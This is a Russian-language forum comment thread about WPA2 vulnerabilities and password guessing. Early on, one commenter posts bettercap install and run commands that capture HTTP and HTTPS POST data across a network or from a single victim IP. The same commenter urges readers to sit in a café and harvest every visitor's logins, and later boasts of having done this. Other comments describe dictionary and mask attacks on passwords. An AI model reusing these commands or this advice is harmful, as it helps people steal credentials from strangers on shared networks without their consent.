Критические уязвимости в протоколе WPA2

есть вообще комбайн bettercap - сбор паролей в http

# sudo apt install build-essential ruby-dev libpcap-dev
# sudo gem install bettercap
# sudo bettercap -XL
# sudo bettercap --proxy -P POST  - пасет всю сеть
# sudo bettercap -T 192.168.x.x --proxy -P POST  - конкретная жертва

# sudo bettercap --proxy --proxy-https -P POST
# sudo bettercap -T 192.168.x.x --proxy --proxy-https -P POST

все что вам осталось это прийти в интернет кафе, купить кружечку кофе узнать пароль от вафли и начать шмонать всех посетителей кафе при помощи ettercap или bettercap, рано или поздно кто нибудь залогинится через http и ... и обычно люди делают везде одинаковые логин\пароль что бы мозг не лопнул от запоминания, дальше дело техники...

Вон таки на Хабре пишут, что в случае AES-шифрования в WPA2

https спасает гиганта мысли.

В случае с ethernet можно воткнуться в свитч или в кабель и послушать, там нет шифрования.

Ну это крайний случай, я его не рассматриваю. Так можно у жертвы и терморектальным способом все узнать, не усложняя дело Wi-Fi'ем.

Осень просто.

это был сарказм

А я ждал нормальный ответ

та кто ж те запретит? просто так себе аргументация

На тебе лежит бремя доказательств. man чайник рассела

Ну почему ты считаешь себя умей других я уже спрашивать не буду

У меня нет основания считать каждого встречного умнее себя. Предоставь доказательства и я изменю свою точку зрения.

Разработчики LEDE уже выпустили обновление для стабильного выпуска. https://lede-project.org/releases/17.01/notes-17.01.4

Избыточность человеческой речи очень велика. Говоря по-простому, угадал первые буквы — угадал всю фразу.

Товарищи знатоки WPA. Поясните пожалуйста каким именно образом переиспользование nonce (в тех случаях когда он не 0) ведет к возможности расшифровки траффика? В сабжевой статье об этом не упоминается. Есть ли практические достижения в этой области?

все что вам осталось это прийти в интернет кафе

Чего? В любой кафешке WiFi он и так открытый.

Избыточность человеческой речи очень велика.

ну ок, я только что загадал слово - угадай, какое. даю тебе даже мегаподсказку, которую в реальности тебе никто никогда не даст - слово из 11 букв .... и одной цыфры. сутки тебе на угадывание, время пошло...

Семен принес ответ.

https://youtu.be/mYtvjijATa4?t=5m55s https://github.com/SpiderLabs/cribdrag

Ох... тот случай, когда наименование не соответствует содержанию.

В (подобранном на помойке) словаре английских слов ≈46K слов длиной 11 символов (встречаются очень странные слова, типа Zulu-kaffir :)). Использование десятичной цифры на произвольной позиции увеличивает количество вариантов в 120 раз. Это, что называется, оценка сверху, для брутфорса.

Если, тем или иным способом, оказывается известной первая буква пароля, то в худшем случае остается проверить 7*120 вариантов, в среднем — 892*120 вариантов. Если известны 2 буквы — что ж, оценка снизу — 120 вариантов (т.е. часть 11-буквенных слов определяется просто по первым двум буквам) при среднем количестве проверок — 90*120.

И это я ещё позволяю цифру в любую позицию пихать. А в постановке задачи-то фигурирует «слово + цифра».

Какгрицца, сравните с ≈100¹² (я оценил в сотню количество символов, вводимых с клавиатуры).

да уж, какое умище пропадает. предположим что пароль простой - без смены регистра, без спецзнаков, и даже без цыфр. типа знаменитого стишка «сороктысячьобезьянвжопусунулибанан». допустим даже ( а это нереальный просто подарок), что аж первые три буквы пароля известны. при этом, логично, не известна ни длина пароля, ни что он собой вообще представляет. какова оценочная сложность и временные затраты такое подобрать брутфорсом?

а также составленную пару предложений из произвольного места произвольной книги?

В любой кафешке WiFi он и так открытый

наверно кони все такие ... это все бесполезно, открытый\закрытый это не имеет значения - шмонается траф всех подключеных

каких масок, каких словарей?

Обычных. Например.
пароль: чудаквасяпупкин
словарь: чудак, идиот, дебил, вася, петя, миша, пупкин.
Подбирают из разных расположений слов, а-ля идиотмишапупких, петядебил, и т.д. Это получается куда быстрее чем посимвольный брутфорс.

Мда уж, это жесть конечно...

Причем тут эта новость к твоему высказыванию о кафешках?

Или ты для себя устройства WiFi открываешь?

понятно, сэнкс. значит таки надо вводить и какие то необычности в слова в фразы тоже, иначе время перебора и сложность угадывания сильно падают.

Прилетело вчера.

Робот до сих пор не заштопан. Пора валить на яблоко.

Я потенциально купил бы истребитель, но денег в моём дырявом кармане хватает только на симулятор.

В ряде случаев посимвольно получается эффективнее.

Причем тут эта новость к твоему высказыванию о кафешках?

это высказывание к двум моим высказыванием выше которые в свою очередь относятся к уязвимостям и не только wifi - вся сеть http давно как на ладони и доступно это любому какеру, год назад уже по полной использовал данные уязвимости, естественно действовал по мануалам - которым тоже было не менее года... так что новость как бы с длиннющей бородой...

Решето.

А если протоколы изменить? Или методы шифрования?

Так для сведения. Кстати существуют и региональные словари для вариантов когда слово набирается латиницей, например пупкин gegrby. Пользуют в основном по конкретным регионам. Фраза взятая из языка не «популярном» в данном регионе все-таки снижает вероятность подбора. Снижает но дает «гарантий» :)

а слово написанные с граммошибками, типа Абизяна ? подстановки символов в словах, вместо s $ и соу?

а слово написанные с граммошибками, типа Абизяна ?

Ну настолько детально не всматривался. Думаю если слово популярное (с грам. ошибкой) может и быть включено.

подстановки символов в словах, вместо s $

Вот подобное где-то встречал... s-$, for-4 и т.п.